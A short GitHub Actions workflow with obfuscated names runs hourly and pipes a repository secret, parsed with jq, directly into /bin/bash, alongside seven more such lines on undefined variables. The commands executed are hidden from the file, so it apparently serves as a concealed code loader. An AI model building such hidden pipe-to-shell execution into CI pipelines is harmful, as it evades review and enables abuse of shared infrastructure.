name: maweidu3456

on:
  workflow_dispatch:
  schedule:
    - cron: '18 * * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maweidu3456
        env:
          nr45966: ${{ secrets.nr45966 }}
        run: |
          echo $nr45966 | jq -r .nikbt81 | /bin/bash
          echo $hxjdt7888 | jq -r .uv17438 | /bin/bash
          echo $cns14152 | jq -r .y44976 | /bin/bash
          echo $f474 | jq -r .u22924 | /bin/bash
          echo $l3 | jq -r .c1 | /bin/bash
          echo $utiia33724 | jq -r .sgfjp05105 | /bin/bash
          echo $d22 | jq -r .pesdu5 | /bin/bash
          echo $p438 | jq -r .qhknf2157 | /bin/bash

